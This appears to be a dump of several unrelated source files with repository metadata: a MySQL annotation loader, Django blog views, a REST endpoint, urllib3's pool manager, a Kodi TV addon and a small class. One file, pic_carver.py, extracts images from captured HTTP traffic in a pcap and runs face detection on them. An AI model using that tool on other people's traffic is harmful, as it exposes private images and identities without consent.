sql = "INSERT INTO posts(postid,title,body) VALUES (%s, %s, %s)"
cursor.execute(sql, (postid, title, body))
db.commit()
print "Populated the posts table."
# Then fill the demo user's table
csvfile = csvdir + '/' + subforum + '_annotation_candidates.csv'
csv_open = open(csvfile, 'r')
csv = csv_open.readlines()
csv_open.close()
for row in csv:
row = row.strip()
cells = row.split('\t')
pairid = cells[0] + '-' + cells[1]
pairtype = cells[2]
sql = "INSERT INTO table_demo(pair,pairtype,verdict) VALUES (%s, %s, 'noverdict')"
cursor.execute(sql, (pairid, pairtype))
db.commit()
print "Filled table_demo table."
def usage():
usage_text = '''
This script can be used to create and fill a mysql database that's used for the annotation of CQADupStack data.
USAGE: ''' + os.path.basename(__file__) + ''' <zipdir>
<zipdir> is the directory with the CQADupStack .zip files.
This can be downloaded from http://nlp.cis.unimelb.edu.au/resources/cqadupstack/.
'''
print usage_text
sys.exit(' ')
if __name__ == "__main__":
if len(sys.argv[1:]) != 1:
usage()
else:
try:
zipdir = sys.argv[1]
csvdir = 'csv/'
annotationfiles = glob.glob(csvdir + '/*_annotation_candidates.csv')
for f in annotationfiles:
subforum = os.path.basename(f).split('_')[0]
db, cursor = connectDB()
createDB(db, cursor, subforum)
createTables(db, cursor, subforum)
populateDB(db, cursor, subforum, zipdir, csvdir)
print "Closing the connection..."
cursor.close()
except:
cgi.print_exception()
|
[
"hoogeveen@textkernel.nl"
] |
hoogeveen@textkernel.nl
|
62afbbf5d532f45a0bd8428e83ef55bf112e19de
|
66207c5881567f50cc30179cfe205a194212d4f1
|
/blog/views.py
|
2799d92590bfe37d27dd156142c8bcb9ea768996
|
[] |
no_license
|
6256163/Django_Blog
|
fe214a81f0231775a13e2e8ccbdbe8114cf3e0be
|
a20ae86f1728363b7a317723156f7c21ffa1c9d0
|
refs/heads/master
| 2020-05-21T17:49:11.113551
| 2016-12-14T04:17:02
| 2016-12-14T04:17:02
| 64,593,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,236
|
py
|
# coding=utf-8
from __future__ import unicode_literals
from copy import copy
import redis
from blog.permissions import IsOwnerOrReadOnly
from blog.serializers import BlogSerializer, ReplySerializer, ReplyInReplySerializer
from rest_framework import permissions, viewsets, renderers
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.reverse import reverse
from users.forms import RegisterForm
from .models import Blog, Reply, ReplyInReply
# Create your views here.
class BlogViewSet(viewsets.ModelViewSet):
"""
This viewset provides `list`, `create`, `retrieve`, `update` and `destroy` actions.
"""
queryset = Blog.objects.all()
serializer_class = BlogSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,)
renderer_classes = (renderers.TemplateHTMLRenderer, renderers.JSONRenderer,)
r = redis.StrictRedis(host='localhost', port=6379, db=0)
def perform_create(self, serializer):
serializer.save(user=self.request.user, latest_reply_user=self.request.user)
    # Override retrieve to support pagination
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer_blog = self.get_serializer(instance)
replies_queryset = Reply.objects.filter(blog=instance)
page = self.paginate_queryset(replies_queryset)
self.r.incr('visit:' + serializer_blog.data['url'] + ':totals')
if page is not None:
serializer_reply = ReplySerializer(page, context=self.get_serializer_context(), many=True)
return Response(
{"blog": serializer_blog.data, "replies": self.get_paginated_response(serializer_reply.data).data},
template_name='blog/detail.html')
serializer_reply = ReplySerializer(replies_queryset, context=self.get_serializer_context(), many=True)
return Response({"blog": serializer_blog.data, "replies": serializer_reply.data},
template_name='blog/detail.html')
    # Override create to filter the 'blog_title' field
def create(self, request, *args, **kwargs):
data = copy(request.data)
data['blog_title'] = data['blog_title'].replace("\n", "")
serializer = self.get_serializer(data=data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
self.r.set('visit:' + serializer.data['url'] + ':totals',0)
headers = self.get_success_headers(serializer.data)
        # The template_name in this return has no real effect; the unit tests require the returned template to be specified.
return Response(serializer.data, status=302, headers=headers,template_name='blog/index.html',)
    # Override list to support pagination
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset()).order_by("-pub_date")
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
blogs = self.get_paginated_response(serializer.data).data
click = list()
for b in blogs['results']:
click.append(self.r.get('visit:' + b['url'] + ':totals').strip() if self.r.get('visit:' + b['url'] + ':totals') else 0)
return Response({'blog': blogs,
'click':click,
'user': request.user,
'form': RegisterForm},
template_name='blog/index.html')
serializer = self.get_serializer(queryset, many=True)
return Response({'blog': serializer,
'user': request.user,
'form': RegisterForm}, template_name='blog/index.html')
class ReplyViewSet(viewsets.ModelViewSet):
"""
This viewset provides `list`, `create`, `retrieve`, `update` and `destroy` actions.
"""
queryset = Reply.objects.all()
serializer_class = ReplySerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly)
renderer_classes = (renderers.TemplateHTMLRenderer, renderers.JSONRenderer)
template_name = "blog/reply_in_reply.html"
def perform_create(self, serializer):
serializer.save(user=self.request.user)
    # Override retrieve to support pagination
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer = self.get_serializer(instance)
queryset = ReplyInReply.objects.filter(reply=instance)
page = self.paginate_queryset(queryset)
if page is not None:
reply_serializer = ReplyInReplySerializer(page, context=self.get_serializer_context(), many=True)
data = {
"reply": serializer.data,
"replies_in_reply": self.get_paginated_response(reply_serializer.data).data
}
return Response(data, template_name=self.template_name)
reply_serializer = ReplyInReplySerializer(queryset, context=self.get_serializer_context(), many=True)
data = {"reply": serializer.data, "replies_in_reply": reply_serializer.data}
return Response(data, template_name=self.template_name)
class ReplyInReplyViewSet(viewsets.ModelViewSet):
"""
This viewset provides `list`, `create`, `retrieve`, `update` and `destroy` actions.
"""
queryset = ReplyInReply.objects.all()
serializer_class = ReplyInReplySerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly)
def perform_create(self, serializer):
serializer.save(user=self.request.user)
def get_queryset(self):
"""
Optionally restricts the returned purchases to a given user,
by filtering against a `username` query parameter in the URL.
"""
queryset = ReplyInReply.objects.all()
reply = self.request.GET.get('reply', None)
if reply is not None:
queryset = queryset.filter(reply=reply)
return queryset
@api_view(['GET'])
def api_root(request, format=None):
return Response({
'blogs': reverse('blog-list', request=request, format=format)
})
|
[
"279736390@qq.com"
] |
279736390@qq.com
|
b4763a14a248b1f0f0efcbc15e54c47c6fc13e15
|
ea18968292a59056bc61b3244cefe72ffef78cd3
|
/mysockets/pic_carver.py
|
e7c4ee910da34a33bd9052c0addbc21a710daac9
|
[] |
no_license
|
mladenangel/netlib
|
005d472321aeb60de763c2340772118c80bec279
|
15cf2233c9afb59273b04318400507fc6c26799b
|
refs/heads/master
| 2021-07-02T17:55:00.877326
| 2017-09-22T09:16:43
| 2017-09-22T09:16:43
| 103,915,556
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,976
|
py
|
# delwin
import re
import zlib
import cv2
from scapy.all import *
pictures_directory = "pic_carver/pictures"
faces_directory = "pic_carver/faces"
pcap_file = "bhp.pcap"
def face_detect(path,file_name):
img = cv2.imread(path)
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))
if len(rects) == 0:
return False
rects[:, 2:] += rects[:, :2]
# highlight the faces in the image
for x1,y1,x2,y2 in rects:
cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)
cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)
return True
def get_http_headers(http_payload):
try:
# split the headers off if it is HTTP traffic
headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
# break out the headers
headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
except:
return None
if "Content-Type" not in headers:
return None
return headers
def extract_image(headers,http_payload):
image = None
image_type = None
try:
if "image" in headers['Content-Type']:
# grab the image type and image body
image_type = headers['Content-Type'].split("/")[1]
image = http_payload[http_payload.index("\r\n\r\n")+4:]
# if we detect compression decompress the image
try:
if "Content-Encoding" in headers.keys():
if headers['Content-Encoding'] == "gzip":
image = zlib.decompress(image,16+zlib.MAX_WBITS)
elif headers['Content-Encoding'] == "deflate":
image = zlib.decompress(image)
except:
pass
except:
return None,None
return image,image_type
def http_assembler(pcap_file):
carved_images = 0
faces_detected = 0
a = rdpcap(pcap_file)
sessions = a.sessions()
for session in sessions:
http_payload = ""
for packet in sessions[session]:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
# reassemble the stream into a single buffer
http_payload += str(packet[TCP].payload)
except:
pass
headers = get_http_headers(http_payload)
if headers is None:
continue
image,image_type = extract_image(headers,http_payload)
if image is not None and image_type is not None:
# store the image
file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
fd = open("%s/%s" % (pictures_directory,file_name),"wb")
fd.write(image)
fd.close()
carved_images += 1
# now attempt face detection
try:
result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)
if result is True:
faces_detected += 1
except:
pass
return carved_images, faces_detected
carved_images, faces_detected = http_assembler(pcap_file)
print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected
|
[
"noreply@github.com"
] |
mladenangel.noreply@github.com
|
e9b7132d6589ec6b9e50e266625178a1d3ac89c7
|
aff5561456692039166942f3bdeb5b0f04836e87
|
/OuterLayers/AdapterLayer/RESTAPI/Endpoints/Comment/GETAnswerComments.py
|
ac0c9d8213264f14bd43a6da84e03e7ccdd8cf3f
|
[] |
no_license
|
BinMunawir/MiniOverflow
|
5d12c5fd22764ebcf01930686f5a8d7e6ff909e3
|
a8172de7cc443d738f734a2325d990fe7c396030
|
refs/heads/main
| 2023-02-22T20:03:08.218448
| 2021-01-28T04:02:27
| 2021-01-28T04:02:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
import json
from InnerLayers.DomainLayer.DomainSpecificLanguage.UUID import UUID
from InnerLayers.UsecaseLayer.ApplicationUsecases.CommentUsecases import getAnswerComments
from InnerLayers.UsecaseLayer.DataTrnsferObjects.CommentDTO import CommentDTO
from InnerLayers.UsecaseLayer.DataTrnsferObjects.AnswerDTO import AnswerDTO
from OuterLayers.AdapterLayer.RESTAPI.Endpoint import Endpoint
from OuterLayers.AdapterLayer.RESTAPI.Endpoints.Exception import HttpException
from OuterLayers.AdapterLayer.RESTAPI.HttpRequest import HttpRequest
from OuterLayers.AdapterLayer.RESTAPI.HttpResponse import HttpResponse
class GETAnswerComments(Endpoint):
method = "GET"
path = "/api/questions/:questionID/answers/:answerID/comments"
def __init__(self, request: HttpRequest):
super(GETAnswerComments, self).__init__(request)
def handle(self) -> HttpResponse:
try:
answerID = self.request.pathParams['answerID']
except Exception as e:
            raise HttpException(1111, 'answerID is required')
comments = getAnswerComments(UUID(answerID))
commentsMap = CommentDTO.toListOfMap(comments)
response: HttpResponse = HttpResponse(200, {'Content-Type': 'application/json'}, json.dumps(commentsMap))
return response
|
[
"abdullahbinmunawer@gmail.com"
] |
abdullahbinmunawer@gmail.com
|
d31fee29f41d7a84bcc9e0f2bc6953fa075e0fdb
|
7cfd109b11467a808a8481b8099f1906c646cf80
|
/blynkpay/asgi.py
|
e8d8f02b1756f3d1c9ae159513724233dc2d8117
|
[] |
no_license
|
UltraCreation-IT-Solution/BlinkPay
|
c3b6c1de95cc9f9bd099f5e65ab003be20cef38a
|
8e8cb4eae0a416736215fa237ae7e47fa50cf207
|
refs/heads/main
| 2023-08-19T08:37:51.961088
| 2021-09-29T05:49:50
| 2021-09-29T05:49:50
| 394,994,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
ASGI config for blynkpay project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'blynkpay.settings')
application = get_asgi_application()
|
[
"rishabh2023@gmail.com"
] |
rishabh2023@gmail.com
|
ea07e60204dcadc0b5fd7d6305d91563532fd57a
|
2a9a136296e3d2abebf3a3dbfbbb091076e9f15f
|
/env/Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
dd5e68c338aa17148c657138f88181a224ea1079
|
[] |
no_license
|
Lisukod/planet-tracker
|
a865e3920b858000f5d3de3b11f49c3d158e0e97
|
6714e6332b1dbccf7a3d44430620f308c9560eaa
|
refs/heads/master
| 2023-02-18T19:26:16.705182
| 2021-01-23T01:51:58
| 2021-01-23T01:51:58
| 328,032,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,048
|
py
|
from __future__ import absolute_import
import collections
import functools
import logging
from ._collections import RecentlyUsedContainer
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
port_by_scheme,
)
from .exceptions import (
LocationValueError,
MaxRetryError,
ProxySchemeUnknown,
ProxySchemeUnsupported,
URLSchemeUnknown,
)
from .packages import six
from .packages.six.moves.urllib.parse import urljoin
from .request import RequestMethods
from .util.proxy import connection_requires_http_tunnel
from .util.retry import Retry
from .util.url import parse_url
__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"]
log = logging.getLogger(__name__)
SSL_KEYWORDS = (
"key_file",
"cert_file",
"cert_reqs",
"ca_certs",
"ssl_version",
"ca_cert_dir",
"ssl_context",
"key_password",
)
# All known keyword arguments that could be provided to the pool manager, its
# pools, or the underlying connections. This is used to construct a pool key.
_key_fields = (
"key_scheme", # str
"key_host", # str
"key_port", # int
"key_timeout", # int or float or Timeout
"key_retries", # int or Retry
"key_strict", # bool
"key_block", # bool
"key_source_address", # str
"key_key_file", # str
"key_key_password", # str
"key_cert_file", # str
"key_cert_reqs", # str
"key_ca_certs", # str
"key_ssl_version", # str
"key_ca_cert_dir", # str
"key_ssl_context", # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext
"key_maxsize", # int
"key_headers", # dict
"key__proxy", # parsed proxy url
"key__proxy_headers", # dict
"key__proxy_config", # class
"key_socket_options", # list of (level (int), optname (int), value (int or str)) tuples
"key__socks_options", # dict
"key_assert_hostname", # bool or string
"key_assert_fingerprint", # str
"key_server_hostname", # str
)
#: The namedtuple class used to construct keys for the connection pool.
#: All custom key schemes should include the fields in this key at a minimum.
PoolKey = collections.namedtuple("PoolKey", _key_fields)
_proxy_config_fields = ("ssl_context", "use_forwarding_for_https")
ProxyConfig = collections.namedtuple("ProxyConfig", _proxy_config_fields)
def _default_key_normalizer(key_class, request_context):
"""
Create a pool key out of a request context dictionary.
According to RFC 3986, both the scheme and host are case-insensitive.
Therefore, this function normalizes both before constructing the pool
key for an HTTPS request. If you wish to change this behaviour, provide
alternate callables to ``key_fn_by_scheme``.
:param key_class:
The class to use when constructing the key. This should be a namedtuple
with the ``scheme`` and ``host`` keys at a minimum.
:type key_class: namedtuple
:param request_context:
A dictionary-like object that contain the context for a request.
:type request_context: dict
:return: A namedtuple that can be used as a connection pool key.
:rtype: PoolKey
"""
# Since we mutate the dictionary, make a copy first
context = request_context.copy()
context["scheme"] = context["scheme"].lower()
context["host"] = context["host"].lower()
# These are both dictionaries and need to be transformed into frozensets
for key in ("headers", "_proxy_headers", "_socks_options"):
if key in context and context[key] is not None:
context[key] = frozenset(context[key].items())
# The socket_options key may be a list and needs to be transformed into a
# tuple.
socket_opts = context.get("socket_options")
if socket_opts is not None:
context["socket_options"] = tuple(socket_opts)
# Map the kwargs to the names in the namedtuple - this is necessary since
# namedtuples can't have fields starting with '_'.
for key in list(context.keys()):
context["key_" + key] = context.pop(key)
# Default to ``None`` for keys missing from the context
for field in key_class._fields:
if field not in context:
context[field] = None
return key_class(**context)
#: A dictionary that maps a scheme to a callable that creates a pool key.
#: This can be used to alter the way pool keys are constructed, if desired.
#: Each PoolManager makes a copy of this dictionary so they can be configured
#: globally here, or individually on the instance.
key_fn_by_scheme = {
"http": functools.partial(_default_key_normalizer, PoolKey),
"https": functools.partial(_default_key_normalizer, PoolKey),
}
pool_classes_by_scheme = {
"http": HTTPConnectionPool,
"https": HTTPSConnectionPool,
}
class PoolManager(RequestMethods):
"""
Allows for arbitrary requests while transparently keeping track of
necessary connection pools for you.
:param num_pools:
Number of connection pools to cache before discarding the least
recently used pool.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param \\**connection_pool_kw:
Additional parameters are used to create fresh
:class:`urllib3.connectionpool.ConnectionPool` instances.
Example::
>>> manager = PoolManager(num_pools=2)
>>> r = manager.request('GET', 'http://google.com/')
>>> r = manager.request('GET', 'http://google.com/mail')
>>> r = manager.request('GET', 'http://yahoo.com/')
>>> len(manager.pools)
2
"""
proxy = None
proxy_config = None
def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
RequestMethods.__init__(self, headers)
self.connection_pool_kw = connection_pool_kw
self.pools = RecentlyUsedContainer(
num_pools, dispose_func=lambda p: p.close()
)
# Locally set the pool classes and keys so other PoolManagers can
# override them.
self.pool_classes_by_scheme = pool_classes_by_scheme
self.key_fn_by_scheme = key_fn_by_scheme.copy()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.clear()
# Return False to re-raise any potential exceptions
return False
def _new_pool(self, scheme, host, port, request_context=None):
"""
Create a new :class:`urllib3.connectionpool.ConnectionPool` based on host, port, scheme, and
any additional pool keyword arguments.
If ``request_context`` is provided, it is provided as keyword arguments
to the pool class used. This method is used to actually create the
connection pools handed out by :meth:`connection_from_url` and
companion methods. It is intended to be overridden for customization.
"""
pool_cls = self.pool_classes_by_scheme[scheme]
if request_context is None:
request_context = self.connection_pool_kw.copy()
# Although the context has everything necessary to create the pool,
# this function has historically only used the scheme, host, and port
# in the positional args. When an API change is acceptable these can
# be removed.
for key in ("scheme", "host", "port"):
request_context.pop(key, None)
if scheme == "http":
for kw in SSL_KEYWORDS:
request_context.pop(kw, None)
return pool_cls(host, port, **request_context)
def clear(self):
"""
Empty our store of pools and direct them all to close.
This will not affect in-flight connections, but they will not be
re-used after completion.
"""
self.pools.clear()
def connection_from_host(
self, host, port=None, scheme="http", pool_kwargs=None
):
"""
Get a :class:`urllib3.connectionpool.ConnectionPool` based on the host, port, and scheme.
If ``port`` isn't given, it will be derived from the ``scheme`` using
``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is
provided, it is merged with the instance's ``connection_pool_kw``
variable and used to create the new connection pool, if one is
needed.
"""
if not host:
raise LocationValueError("No host specified.")
request_context = self._merge_pool_kwargs(pool_kwargs)
request_context["scheme"] = scheme or "http"
if not port:
port = port_by_scheme.get(request_context["scheme"].lower(), 80)
request_context["port"] = port
request_context["host"] = host
return self.connection_from_context(request_context)
def connection_from_context(self, request_context):
"""
Get a :class:`urllib3.connectionpool.ConnectionPool` based on the request context.
``request_context`` must at least contain the ``scheme`` key and its
value must be a key in ``key_fn_by_scheme`` instance variable.
"""
scheme = request_context["scheme"].lower()
pool_key_constructor = self.key_fn_by_scheme.get(scheme)
if not pool_key_constructor:
raise URLSchemeUnknown(scheme)
pool_key = pool_key_constructor(request_context)
return self.connection_from_pool_key(
pool_key, request_context=request_context
)
def connection_from_pool_key(self, pool_key, request_context=None):
"""
Get a :class:`urllib3.connectionpool.ConnectionPool` based on the provided pool key.
``pool_key`` should be a namedtuple that only contains immutable
objects. At a minimum it must have the ``scheme``, ``host``, and
``port`` fields.
"""
with self.pools.lock:
# If the scheme, host, or port doesn't match existing open
# connections, open a new ConnectionPool.
pool = self.pools.get(pool_key)
if pool:
return pool
# Make a fresh ConnectionPool of the desired type
scheme = request_context["scheme"]
host = request_context["host"]
port = request_context["port"]
pool = self._new_pool(
scheme, host, port, request_context=request_context
)
self.pools[pool_key] = pool
return pool
def connection_from_url(self, url, pool_kwargs=None):
"""
Similar to :func:`urllib3.connectionpool.connection_from_url`.
If ``pool_kwargs`` is not provided and a new pool needs to be
constructed, ``self.connection_pool_kw`` is used to initialize
the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
is provided, it is used instead. Note that if a new pool does not
need to be created for the request, the provided ``pool_kwargs`` are
not used.
"""
u = parse_url(url)
return self.connection_from_host(
u.host, port=u.port, scheme=u.scheme, pool_kwargs=pool_kwargs
)
def _merge_pool_kwargs(self, override):
"""
Merge a dictionary of override values for self.connection_pool_kw.
This does not modify self.connection_pool_kw and returns a new dict.
Any keys in the override dictionary with a value of ``None`` are
removed from the merged dictionary.
"""
base_pool_kwargs = self.connection_pool_kw.copy()
if override:
for key, value in override.items():
if value is None:
try:
del base_pool_kwargs[key]
except KeyError:
pass
else:
base_pool_kwargs[key] = value
return base_pool_kwargs
def _proxy_requires_url_absolute_form(self, parsed_url):
"""
Indicates if the proxy requires the complete destination URL in the
request. Normally this is only needed when not using an HTTP CONNECT
tunnel.
"""
if self.proxy is None:
return False
return not connection_requires_http_tunnel(
self.proxy, self.proxy_config, parsed_url.scheme
)
def _validate_proxy_scheme_url_selection(self, url_scheme):
"""
Validates that were not attempting to do TLS in TLS connections on
Python2 or with unsupported SSL implementations.
"""
if self.proxy is None or url_scheme != "https":
return
if self.proxy.scheme != "https":
return
if six.PY2 and not self.proxy_config.use_forwarding_for_https:
raise ProxySchemeUnsupported(
"Contacting HTTPS destinations through HTTPS proxies "
"'via CONNECT tunnels' is not supported in Python 2"
)
def urlopen(self, method, url, redirect=True, **kw):
"""
Same as :meth:`urllib3.HTTPConnectionPool.urlopen`
with custom cross-host redirect logic and only sends the request-uri
portion of the ``url``.
The given ``url`` parameter must be absolute, such that an appropriate
:class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
"""
u = parse_url(url)
self._validate_proxy_scheme_url_selection(u.scheme)
conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)
kw["assert_same_host"] = False
kw["redirect"] = False
if "headers" not in kw:
kw["headers"] = self.headers.copy()
if self._proxy_requires_url_absolute_form(u):
response = conn.urlopen(method, url, **kw)
else:
response = conn.urlopen(method, u.request_uri, **kw)
redirect_location = redirect and response.get_redirect_location()
if not redirect_location:
return response
# Support relative URLs for redirecting.
redirect_location = urljoin(url, redirect_location)
# RFC 7231, Section 6.4.4
if response.status == 303:
method = "GET"
retries = kw.get("retries")
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect)
# Strip headers marked as unsafe to forward to the redirected location.
# Check remove_headers_on_redirect to avoid a potential network call within
# conn.is_same_host() which may use socket.gethostbyname() in the future.
if retries.remove_headers_on_redirect and not conn.is_same_host(
redirect_location
):
headers = list(six.iterkeys(kw["headers"]))
for header in headers:
if header.lower() in retries.remove_headers_on_redirect:
kw["headers"].pop(header, None)
try:
retries = retries.increment(
method, url, response=response, _pool=conn
)
except MaxRetryError:
if retries.raise_on_redirect:
response.drain_conn()
raise
return response
kw["retries"] = retries
kw["redirect"] = redirect
log.info("Redirecting %s -> %s", url, redirect_location)
response.drain_conn()
return self.urlopen(method, redirect_location, **kw)
class ProxyManager(PoolManager):
"""
Behaves just like :class:`PoolManager`, but sends all requests through
the defined proxy, using the CONNECT method for HTTPS URLs.
:param proxy_url:
The URL of the proxy to be used.
:param proxy_headers:
A dictionary containing headers that will be sent to the proxy. In case
of HTTP they are being sent with each request, while in the
HTTPS/CONNECT case they are sent only once. Could be used for proxy
authentication.
:param proxy_ssl_context:
The proxy SSL context is used to establish the TLS connection to the
proxy when using HTTPS proxies.
:param use_forwarding_for_https:
(Defaults to False) If set to True will forward requests to the HTTPS
proxy to be made on behalf of the client instead of creating a TLS
tunnel via the CONNECT method. **Enabling this flag means that request
and response headers and content will be visible from the HTTPS proxy**
whereas tunneling keeps request and response headers and content
private. IP address, target hostname, SNI, and port are always visible
to an HTTPS proxy even when this flag is disabled.
Example:
>>> proxy = urllib3.ProxyManager('http://localhost:3128/')
>>> r1 = proxy.request('GET', 'http://google.com/')
>>> r2 = proxy.request('GET', 'http://httpbin.org/')
>>> len(proxy.pools)
1
>>> r3 = proxy.request('GET', 'https://httpbin.org/')
>>> r4 = proxy.request('GET', 'https://twitter.com/')
>>> len(proxy.pools)
3
"""
def __init__(
self,
proxy_url,
num_pools=10,
headers=None,
proxy_headers=None,
proxy_ssl_context=None,
use_forwarding_for_https=False,
**connection_pool_kw
):
if isinstance(proxy_url, HTTPConnectionPool):
proxy_url = "%s://%s:%i" % (
proxy_url.scheme,
proxy_url.host,
proxy_url.port,
)
proxy = parse_url(proxy_url)
if proxy.scheme not in ("http", "https"):
raise ProxySchemeUnknown(proxy.scheme)
if not proxy.port:
port = port_by_scheme.get(proxy.scheme, 80)
proxy = proxy._replace(port=port)
self.proxy = proxy
self.proxy_headers = proxy_headers or {}
self.proxy_ssl_context = proxy_ssl_context
self.proxy_config = ProxyConfig(
proxy_ssl_context, use_forwarding_for_https
)
connection_pool_kw["_proxy"] = self.proxy
connection_pool_kw["_proxy_headers"] = self.proxy_headers
connection_pool_kw["_proxy_config"] = self.proxy_config
super(ProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw
)
def connection_from_host(
self, host, port=None, scheme="http", pool_kwargs=None
):
if scheme == "https":
return super(ProxyManager, self).connection_from_host(
host, port, scheme, pool_kwargs=pool_kwargs
)
return super(ProxyManager, self).connection_from_host(
self.proxy.host,
self.proxy.port,
self.proxy.scheme,
pool_kwargs=pool_kwargs,
)
def _set_proxy_headers(self, url, headers=None):
"""
Sets headers needed by proxies: specifically, the Accept and Host
headers. Only sets headers not provided by the user.
"""
headers_ = {"Accept": "*/*"}
netloc = parse_url(url).netloc
if netloc:
headers_["Host"] = netloc
if headers:
headers_.update(headers)
return headers_
def urlopen(self, method, url, redirect=True, **kw):
"Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute."
u = parse_url(url)
if not connection_requires_http_tunnel(
self.proxy, self.proxy_config, u.scheme
):
# For connections using HTTP CONNECT, httplib sets the necessary
# headers on the CONNECT to the proxy. If we're not using CONNECT,
# we'll definitely need to set 'Host' at the very least.
headers = kw.get("headers", self.headers)
kw["headers"] = self._set_proxy_headers(url, headers)
return super(ProxyManager, self).urlopen(
method, url, redirect=redirect, **kw
)
def proxy_from_url(url, **kw):
return ProxyManager(proxy_url=url, **kw)
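# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of urllib3 itself; host names and
# keyword values below are assumptions for demonstration only):
#
#     import urllib3
#
#     # One PoolManager reuses connections across hosts.
#     http = urllib3.PoolManager(num_pools=10, maxsize=4)
#     resp = http.request("GET", "http://httpbin.org/get")
#     print(resp.status, len(resp.data))
#
#     # Every request below is routed through the proxy; HTTPS destinations
#     # use CONNECT tunnels unless use_forwarding_for_https=True is set.
#     proxy = proxy_from_url("http://localhost:3128/")
#     resp = proxy.request("GET", "https://example.com/")
# ---------------------------------------------------------------------------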
# =============================================================================
# File: /resources/addon.py
# Repo: jyardin/plugin.video.orange.fr  (license: MIT)
# =============================================================================
# -*- coding: utf-8 -*-
"""Addon entry point"""
import routing # pylint: disable=import-error
import inputstreamhelper # pylint: disable=import-error
import xbmcgui
import xbmcplugin
from lib.iptvmanager import IPTVManager
from lib.providers import get_provider
from lib.utils import localize, log, LogLevel, ok_dialog
plugin = routing.Plugin()
@plugin.route('/')
def index():
"""Addon index"""
ok_dialog(localize(30902))
@plugin.route('/channel/<channel_id>')
def channel(channel_id: str):
"""Load stream for the required channel id"""
log('Loading channel {}'.format(channel_id), LogLevel.INFO)
stream = get_provider().get_stream_info(channel_id)
if not stream:
ok_dialog(localize(30900))
return
is_helper = inputstreamhelper.Helper(stream['manifest_type'], drm=stream['drm'])
if not is_helper.check_inputstream():
ok_dialog(localize(30901))
return
listitem = xbmcgui.ListItem(path=stream['path'])
listitem.setMimeType(stream['mime_type'])
listitem.setProperty('inputstream', 'inputstream.adaptive')
listitem.setProperty('inputstream.adaptive.manifest_type', stream['manifest_type'])
listitem.setProperty('inputstream.adaptive.manifest_update_parameter', 'full')
listitem.setProperty('inputstream.adaptive.license_type', stream['license_type'])
listitem.setProperty('inputstream.adaptive.license_key', stream['license_key'])
xbmcplugin.setResolvedUrl(plugin.handle, True, listitem=listitem)
@plugin.route('/iptv/channels')
def iptv_channels():
"""Return JSON-STREAMS formatted data for all live channels"""
log('Loading channels for IPTV Manager', LogLevel.INFO)
port = int(plugin.args.get('port')[0])
IPTVManager(port, get_provider()).send_channels()
@plugin.route('/iptv/epg')
def iptv_epg():
"""Return JSON-EPG formatted data for all live channel EPG data"""
log('Loading EPG for IPTV Manager', LogLevel.INFO)
port = int(plugin.args.get('port')[0])
IPTVManager(port, get_provider()).send_epg()
if __name__ == '__main__':
plugin.run()
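# Note (an assumption about the runtime, not stated in this file): with the
# `routing` plugin used above, Kodi dispatches plugin:// URLs to these
# handlers, e.g. plugin://<addon_id>/channel/<channel_id> maps to channel()
# and plugin://<addon_id>/iptv/channels?port=<n> maps to iptv_channels(),
# with the query string exposed through plugin.args.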
# =============================================================================
# File: /Solutions/Python/These are not my grades! (Revamped !)(7 kyu).py
# Repo: collenirwin/Codewars-Solutions  (license: MIT)
# =============================================================================
class Student:
def __init__(self, first_name, last_name, grades = None):
self.first_name = first_name
self.last_name = last_name
        self.grades = grades if grades is not None else []
def add_grade(self, grade):
self.grades.append(grade)
def get_average(self):
return sum(self.grades) / len(self.grades)
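# Illustrative usage (not required by the kata; shown only as an example):
if __name__ == "__main__":
    student = Student("Ada", "Lovelace", [90, 80])
    student.add_grade(100)
    print(student.get_average())  # (90 + 80 + 100) / 3 -> 90.0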
# =============================================================================
# File: /vgg19hcnn.py
# Repo: ailabnjtech/B-CNN  (license: MIT)
# =============================================================================
# -*- coding: utf-8 -*-
